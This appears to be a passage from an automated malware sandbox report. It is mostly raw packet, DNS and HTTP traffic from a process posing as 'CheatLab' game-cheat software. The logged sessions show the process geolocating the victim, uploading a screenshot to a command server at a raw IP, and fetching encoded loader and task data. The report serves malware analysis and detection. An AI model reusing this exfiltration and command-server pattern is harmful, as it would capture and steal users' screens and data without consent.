                                                    Nov 4, 2023 01:30:16.962032080 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962084055 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962101936 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962101936 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962114096 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962119102 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962157965 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962172985 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962224007 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962240934 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962295055 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962327003 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962327957 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962327957 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962327957 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962337971 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962359905 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962361097 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962378025 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962440014 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962454081 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962455988 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962462902 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962466002 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962519884 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962536097 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962551117 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962551117 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962557077 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962589025 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962599993 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962599993 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962605000 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962661982 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962665081 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962665081 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962671041 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962688923 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962723970 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962728977 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962738037 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962754011 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962790012 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962790012 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962795973 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962809086 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962826014 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962865114 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962865114 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962869883 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962879896 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962879896 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962897062 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962919950 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.962924004 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962953091 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962969065 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.962980032 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963006973 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963011980 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963021994 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963037968 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963044882 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963078976 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963083982 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963103056 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963119984 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963140011 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963151932 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963155031 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963172913 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963190079 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963207006 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963207006 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963213921 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963247061 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963260889 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963267088 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963320971 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963336945 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963387012 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963417053 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963443995 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963443995 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963443995 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963450909 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963459015 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963465929 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963465929 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963476896 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963488102 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963529110 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963542938 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963545084 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963555098 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963603020 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963685989 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963685989 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963685989 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.963695049 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.963778019 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.977241993 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.977252007 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.977299929 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.977308989 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.977555990 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.977555990 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:16.977562904 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:16.977807999 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:17.345617056 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:17.355626106 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:17.413435936 CET49716443192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:30:17.413456917 CET44349716162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:30:51.020667076 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:30:51.250399113 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:51.323874950 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:30:51.324117899 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:31:10.073443890 CET8049704208.95.112.1192.168.2.5
                                                    Nov 4, 2023 01:31:56.325062990 CET8049706193.37.71.112192.168.2.5
                                                    Nov 4, 2023 01:31:56.325236082 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:31:57.827116013 CET4971580192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:31:57.827248096 CET4970680192.168.2.5193.37.71.112
                                                    Nov 4, 2023 01:31:57.919749975 CET8049715162.159.130.233192.168.2.5
                                                    Nov 4, 2023 01:31:57.919877052 CET4971580192.168.2.5162.159.130.233
                                                    Nov 4, 2023 01:31:58.052206993 CET8049706193.37.71.112192.168.2.5

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 4, 2023 01:30:07.877824068 CET6267553192.168.2.51.1.1.1
                                                    Nov 4, 2023 01:30:07.972482920 CET53626751.1.1.1192.168.2.5
                                                    Nov 4, 2023 01:30:15.602210045 CET5161053192.168.2.51.1.1.1
                                                    Nov 4, 2023 01:30:15.694705963 CET53516101.1.1.1192.168.2.5

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Nov 4, 2023 01:30:07.877824068 CET192.168.2.51.1.1.10x2317Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                    Nov 4, 2023 01:30:15.602210045 CET192.168.2.51.1.1.10xe4fcStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Nov 4, 2023 01:30:07.972482920 CET1.1.1.1192.168.2.50x2317No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                    Nov 4, 2023 01:30:15.694705963 CET1.1.1.1192.168.2.50xe4fcNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                    Nov 4, 2023 01:30:15.694705963 CET1.1.1.1192.168.2.50xe4fcNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                    Nov 4, 2023 01:30:15.694705963 CET1.1.1.1192.168.2.50xe4fcNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                    Nov 4, 2023 01:30:15.694705963 CET1.1.1.1192.168.2.50xe4fcNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                    Nov 4, 2023 01:30:15.694705963 CET1.1.1.1192.168.2.50xe4fcNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • cdn.discordapp.com
                                                    • ip-api.com

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.549716162.159.130.233443C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    TimestampkBytes transferredDirectionData


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.549704208.95.112.180C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 4, 2023 01:30:09.475100994 CET1OUTGET /json/?fields=query,status,countryCode,city,timezone HTTP/1.1
                                                    Content-Type: application/json
                                                    User-Agent: Sun
                                                    Host: ip-api.com
                                                    Cache-Control: no-cache
                                                    Nov 4, 2023 01:30:09.569552898 CET1INHTTP/1.1 200 OK
                                                    Date: Sat, 04 Nov 2023 00:30:08 GMT
                                                    Content-Type: application/json; charset=utf-8
                                                    Content-Length: 112
                                                    Access-Control-Allow-Origin: *
                                                    X-Ttl: 60
                                                    X-Rl: 44
                                                    Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 63 69 74 79 22 3a 22 57 61 73 68 69 6e 67 74 6f 6e 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 71 75 65 72 79 22 3a 22 31 35 34 2e 31 36 2e 34 39 2e 38 32 22 7d
                                                    Data Ascii: {"status":"success","countryCode":"US","city":"Washington","timezone":"America/New_York","query":"154.16.49.82"}


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    2192.168.2.549706193.37.71.11280C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Nov 4, 2023 01:30:10.440969944 CET4OUTPUT /loader/screen/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                    Content-Type: multipart/form-data; boundary=qMhxCagN55R5AwRzdpCrqAg3d
                                                    User-Agent: Sun
                                                    Host: 193.37.71.112
                                                    Content-Length: 3933196
                                                    Cache-Control: no-cache
                                                    Nov 4, 2023 01:30:10.441927910 CET15OUTData Raw: 2d 2d 71 4d 68 78 43 61 67 4e 35 35 52 35 41 77 52 7a 64 70 43 72 71 41 67 33 64 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                    Data Ascii: --qMhxCagN55R5AwRzdpCrqAg3dContent-Type: application/octet-streamContent-Disposition: form-data; name="file"; filename="screen.bmp"BM6($$######$$$$$$$$#
                                                    Nov 4, 2023 01:30:10.685731888 CET16OUTData Raw: 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00
                                                    Data Ascii: vlg$$#################################
                                                    Nov 4, 2023 01:30:10.699505091 CET38OUTData Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 c2 c2 c2 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18 00 23 18
                                                    Data Ascii: ##################""""""""""""""""""""""#####################"""###"""""
                                                    Nov 4, 2023 01:30:10.916974068 CET41OUTData Raw: 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0a 01 1b 0a 01 76 6d 67 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00
                                                    Data Ascii: vmg$$$$$$$$$$$$$#########$$$$$$$$$$$$$$$$$$$$##$$$#
                                                    Nov 4, 2023 01:30:10.994204998 CET72OUTData Raw: 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 12 00 1f 11 00 1f 11 00 1f 11 00 1f 11 00 1f
                                                    Data Ascii:
                                                    Nov 4, 2023 01:30:11.195858002 CET77OUTData Raw: 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 b5 b5 b5 14 14 14 12 12 12 70 70 70 c1 c1 c1 e6 e6 e6
                                                    Data Ascii: $$$$pppppp+uu++uRRu++uRR+uu++++++++++++++++++u+R
                                                    Nov 4, 2023 01:30:11.252549887 CET119OUTData Raw: 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 18 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 47 95 aa 5a d4
                                                    Data Ascii: """""""""""""""""""""""""GZXVlwwvvvvvvvvwwhWXY5VU""""""""""""""""""""""""""I*K,L,K,J12Q
                                                    Nov 4, 2023 01:30:11.516469002 CET135OUTData Raw: 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 17 00 22 18 06 28 25 51 30 36 ad 32 3f d8 33 41 e6 33 41 e6 33 41 e7 32 40 e4 33 40 e7 33 40 e7 32 40 e5 33 40 e7 31 3d d4 2c 33 a7 26 20 3a 22 16
                                                    Data Ascii: """"""""""""(%Q062?3A3A3A2@3@3@2@3@1=,3& :"""""""""""""""""""""""""""""""""""(%Q/62>3A3A3A2@3@3@2@3@1=,3& :!!!!!!
                                                    Nov 4, 2023 01:30:11.569145918 CET184OUTData Raw: 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16 00 22 16
                                                    Data Ascii: """""""""""""""""""""""""""""""""""!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!MD3MD3MD3MD3MD3MD3MD3MD3MD3MD3MD3M
                                                    Nov 4, 2023 01:30:11.839792013 CET213OUTData Raw: 93 01 e6 93 01 e6 93 01 e6 93 01 e6 93 01 e6 93 01 e6 93 01 e5 92 00 e5 92 00 e5 92 00 e3 92 01 e3 92 01 e3 92 01 e3 92 01 e3 92 01 e3 92 01 e3 92 01 e3 92 01 e2 91 00 e2 91 00 e2 91 00 e2 91 00 e2 91 00 e2 91 00 e2 91 00 e2 91 00 e2 91 00 e2 91
                                                    Data Ascii:
                                                    Nov 4, 2023 01:30:15.413336039 CET3993INHTTP/1.1 200 OK
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 04 Nov 2023 00:30:15 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 2072
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yC7PztHjQ09dZnp43Xmp1vjKeJorLqkcVBgFV4fSvTyq1nrCqS9LsbrsVxaKymlPHfH42%2B8sQzHuPFK042r8OszEOVreaTYdwpI0JUA3N2VgLSdxV0BBDuLh5ASGKSfYlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    CF-RAY: 8208bf4aae484db5-FRA
                                                    alt-svc: h3=":443"; ma=86400
                                                    Data Raw: 7b 22 6c 6f 61 64 65 72 22 3a 22 59 6a 4d 73 4e 57 49 73 5a 44 49 73 59 6d 4d 73 59 6d 59 73 4f 54 49 73 59 7a 45 73 5a 47 59 73 59 57 49 73 59 6a 59 73 5a 44 41 73 59 6d 45 73 59 6d 59 73 5a 44 55 73 59 7a 59 73 4f 57 51 73 59 6a 59 73 4f 54 59 73 4f 54 51 73 4f 47 51 73 4e 32 49 73 59 54 4d 73 4e 6a 4d 73 4e 54 59 73 4f 54 4d 73 59 6a 59 73 59 7a 55 73 5a 44 49 73 59 7a 63 73 5a 47 45 73 59 7a 59 73 4e 6a 67 73 4e 7a 49 73 4e 54 6b 73 59 54 45 73 4e 6d 59 73 4e 6d 59 73 4e 54 4d 73 59 7a 41 73 5a 44 45 73 59 6a 67 73 59 6a 4d 73 5a 54 41 73 59 7a 49 73 59 6d 51 73 59 32 59 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 5a 57 59 73 4e 32 4d 73 5a 54 45 73 59 6a 51 73 5a 54 51 73 59 54 67 73 4e 54 59 73 4e 6d 4d 73 4e 6a 45 73 4f 44 55 73 4f 54 55 73 4f 44 55 73 4f 54 55 73 4f 44 67 73 4e 7a 49 73 4e 54 67 73 4e 57 49 73 5a 54 4d 73 59 6a 63 73 59 6a 41 73 59 54 55 73 59 7a 4d 73 5a 47 59 73 4e 6d 55 73 4f 47 4d 73 4f 47 49 73 59 7a 67 73 59 32 4d 73 5a 47 4d 73 59 7a 63 73 59 6a 55 73 4e 7a 41 73 4f 54 51 73 4e 32 4d 73 5a 54 45 73 59 57 4d 73 5a 44 6b 73 59 57 59 73 4f 54 6b 73 59 54 59 73 4e 6a 4d 73 4f 47 49 73 4f 44 4d 73 5a 44 41 73 4f 44 63 73 59 32 4d 73 59 57 49 73 59 6a 41 73 59 57 51 73 4f 54 49 73 4e 32 51 73 4e 6d 59 73 4e 54 4d 73 4f 47 59 73 5a 47 45 73 4e 6d 4d 73 59 6a 63 73 5a 47 51 73 59 7a 59 73 59 7a 6b 73 5a 44 6b 73 4f 44 49 73 59 54 63 73 59 54 63 73 5a 44 63 73 59 32 59 73 5a 47 59 73 59 6d 51 73 5a 47 4d 73 59 54 63 73 4e 54 59 73 4e 57 55 73 4e 6a 45 73 4e 7a 4d 73 5a 44 59 73 59 7a 6b 73 59 7a 59 73 59 32 4d 73 59 6d 49 73 59 57 49 73 4e 57 49 73 59 57 45 73 4e 6a 4d 73 59 6a 55 73 4f 54 49 73 59 6d 45 73 5a 47 59 73 59 6a 45 73 59 32 59 73 4f 54 63 73 4e 7a 51 73 4e 32 4d 73 59 32 59 73 59 32 49 73 4f 57 4d 73 59 54 6b 73 4f 54 59 73 4f 54 51 73 4f 47 51 73 4e 32 4d 73 59 54 4d 73 4e 6a 4d 73 4e 54 59 73 59 54 49 73 59 54 59 73 59 7a 4d 73 5a 44 59 73 59 6d 55 73 5a 44 67 73 59 32 4d 73 59 57 49 73 59 54 59 73 4f 57 4d 73 5a 44 55 73 4e 6a 55 73 4f 44 6b 73 4e 54 45 73 4e 32 59 73 5a 54 6b 73 22 2c 22 74 61 73 6b 73 22 3a 22 4f 54 4d 73 59 6a 51 73 4f 54 49 73 59 57 4d 73 59 6a
                                                    Data Ascii: {"loader":"YjMsNWIsZDIsYmMsYmYsOTIsYzEsZGYsYWIsYjYsZDAsYmEsYmYsZDUsYzYsOWQsYjYsOTYsOTQsOGQsN2IsYTMsNjMsNTYsOTMsYjYsYzUsZDIsYzcsZGEsYzYsNjgsNzIsNTksYTEsNmYsNmYsNTMsYzAsZDEsYjgsYjMsZTAsYzIsYmQsY2YsODQsNzIsNjQsZWYsN2MsZTEsYjQsZTQsYTgsNTYsNmMsNjEsODUsOTUsODUsOTUsODgsNzIsNTgsNWIsZTMsYjcsYjAsYTUsYzMsZGYsNmUsOGMsOGIsYzgsY2MsZGMsYzcsYjUsNzAsOTQsN2MsZTEsYWMsZDksYWYsOTksYTYsNjMsOGIsODMsZDAsODcsY2MsYWIsYjAsYWQsOTIsN2QsNmYsNTMsOGYsZGEsNmMsYjcsZGQsYzYsYzksZDksODIsYTcsYTcsZDcsY2YsZGYsYmQsZGMsYTcsNTYsNWUsNjEsNzMsZDYsYzksYzYsY2MsYmIsYWIsNWIsYWEsNjMsYjUsOTIsYmEsZGYsYjEsY2YsOTcsNzQsN2MsY2YsY2IsOWMsYTksOTYsOTQsOGQsN2MsYTMsNjMsNTYsYTIsYTYsYzMsZDYsYmUsZDgsY2MsYWIsYTYsOWMsZDUsNjUsODksNTEsN2YsZTks","tasks":"OTMsYjQsOTIsYWMsYj
                                                    Nov 4, 2023 01:30:15.413363934 CET3994INData Raw: 4d 73 4e 54 4d 73 4f 44 67 73 4f 47 4d 73 4f 44 4d 73 4f 44 59 73 4f 57 51 73 4f 44 41 73 4e 32 45 73 4f 44 6b 73 59 32 55 73 59 54 45 73 59 6a 49 73 5a 47 59 73 4e 32 4d 73 59 54 63 73 4e 6d 49 73 4f 54 6b 73 59 57 49 73 59 54 67 73 59 54 59 73
                                                    Data Ascii: MsNTMsODgsOGMsODMsODYsOWQsODAsN2EsODksY2UsYTEsYjIsZGYsN2MsYTcsNmIsOTksYWIsYTgsYTYsYjEsYzQsOWQsODQsOTQsYmIsYWEsYTYsNjcsZDQsYWMsYzIsOTQsYmQsZGUsYjAsYjMsZGIsYzQsODgsY2EsZDEsYTUsNzMsZDUsY2UsZTEsYWMsZGEsYWIsYTEsOTcsYWYsYzUsZDYsODQsOTYsODksN2MsNmUsN
                                                    Nov 4, 2023 01:30:15.413377047 CET3995INData Raw: 59 6a 49 73 5a 44 45 73 59 6a 67 73 59 6d 49 73 5a 54 45 73 59 6a 6b 73 59 32 4d 73 5a 54 41 73 4f 44 51 73 4e 7a 49 73 4e 6a 51 73 4f 54 59 73 59 6d 49 73 5a 47 49 73 59 7a 51 73 4f 54 6b 73 59 7a 41 73 4f 54 45 73 22 7d
                                                    Data Ascii: YjIsZDEsYjgsYmIsZTEsYjksY2MsZTAsODQsNzIsNjQsOTYsYmIsZGIsYzQsOTksYzAsOTEs"}
                                                    Nov 4, 2023 01:30:51.020667076 CET5813OUTPUT /task/OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms HTTP/1.1
                                                    Content-Type: application/json
                                                    User-Agent: Sun
                                                    Host: 193.37.71.112
                                                    Content-Length: 95
                                                    Cache-Control: no-cache
                                                    Data Raw: 7b 22 64 61 74 61 22 3a 22 59 57 4d 73 4f 57 45 73 5a 54 4d 73 59 57 55 73 4f 54 67 73 4f 54 55 73 4f 47 49 73 59 54 4d 73 4f 44 41 73 4f 44 51 73 4f 54 45 73 59 6a 63 73 59 7a 6b 73 5a 47 4d 73 5a 44 41 73 59 57 4d 73 59 6a 59 73 5a 57 51 73 4f 54 63 73 59 7a 49 73 4f 57 55 3d 22 7d
                                                    Data Ascii: {"data":"YWMsOWEsZTMsYWUsOTgsOTUsOGIsYTMsODAsODQsOTEsYjcsYzksZGMsZDAsYWMsYjYsZWQsOTcsYzIsOWU="}
                                                    Nov 4, 2023 01:30:51.323874950 CET5814INHTTP/1.1 204 No Content
                                                    Server: nginx/1.18.0 (Ubuntu)
                                                    Date: Sat, 04 Nov 2023 00:30:51 GMT
                                                    Connection: keep-alive
                                                    CF-Cache-Status: DYNAMIC
                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=D%2FThL2Krtm0YP%2FwYU3gTxh9L4Y6kP97ubTeLdSmeacK4UJJ8acJazfSZhoQNcrPWetejRtymRjIT63DwR3RkmPmceROU3Qf2NaOSqdomr%2Fd6D6%2FHLAvH0PBC%2F4D3R8S7qPlYT2gSyRliJMp3Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                    CF-RAY: 8208c03189909da5-DME
                                                    alt-svc: h3=":443"; ma=86400


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
